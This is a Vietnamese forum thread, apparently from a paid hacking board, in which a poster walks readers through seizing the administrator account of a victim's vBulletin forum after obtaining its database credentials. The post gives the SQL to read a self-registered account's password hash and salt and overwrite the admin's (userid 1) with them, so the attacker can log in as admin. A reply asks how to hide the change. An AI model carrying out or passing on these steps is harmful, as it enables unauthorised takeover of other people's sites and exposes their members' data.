• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

Tut hướng dẫn chiếm quyền admin vbb trong data

Admin

Well-Known Member
Staff member
Administrator
Tut này cho anh em học hỏi có rất nhiều trường hợp cần linh động.
Ở đây mình sẽ hướng dẫn 3 cách cơ bản để chiếm quyền admin
cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin
Yêu cầu:
Có được info data của victim bao gồm:
PHP:
$config['Database']['dbname'] = 'forum'; $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = '123456';
Hiểu biết sơ về câu lệnh SQL
Đầu tiên là các dạng mã hóa của một vài forum thông dụng hiện nay như:
1. phpBB : md5($pass) //ko dùng salt 2. VBB : md5(md5($pass).$salt) 3. IPB : md5(md5($salt).md5($pass))
Với
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).
OK băt đầu thôi:
Cách 1: change pass admin trong data
Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Select * from user
Với lệnh trên thì ta có thể xem được tất cả user trên forum
Nếu forum victim có số lượng thành viện cỡ hơn 3000 thì ta dung lệnh :
Select password , salt from user where username='hacker'
Ta được
Pass md5 : 5cc70df698ca01c3adb396a08b4873ad Salt: ?`Y
Q: Tại sao lại phải select from user
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.
Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.
Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong forum victim có nhiều admin ma ta ko biết admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A: Vào file config.php và tìm các dòng sau
PHP:
$config['SpecialUsers']['canviewadminlog'] $config['SpecialUsers']['canpruneadminlog'] $config['SpecialUsers']['superadministrators']
Tìm xem userid của thằng rootadmin hay superadmin là báo nhiêu (Thường thì mặc đinh định là userid=1 là rootadmin)
Ta tiếp tục dùng lệnh
Select password , salt from user where userid=1
Lấy được pass md5 & salt
Vi dụ:
Pass md5 : eaf1672523371b7736282bbfc2c8b2ac Salt : 2/D
Tiếp ta dùng lệnh
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google
Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin”
Câu lệnh hoàn chỉnh như sau:
Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1”
Code:
5cc70df698ca01c3adb396a08b4873ad
là pass md5 của nick hacker
Code:
?`Y
là salt của nick hacker
1 là userid của thằng admin
Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào forum victim đăng nhập bằng nick admin với password là 123456
 
Phải có cách ẩn đi ý.
Cho nó vào // trong php hihi.
Mà sao bbcode
PHP:
mình k xài được vậy?
 

Facebook Comments

New posts New threads New resources

Back
Top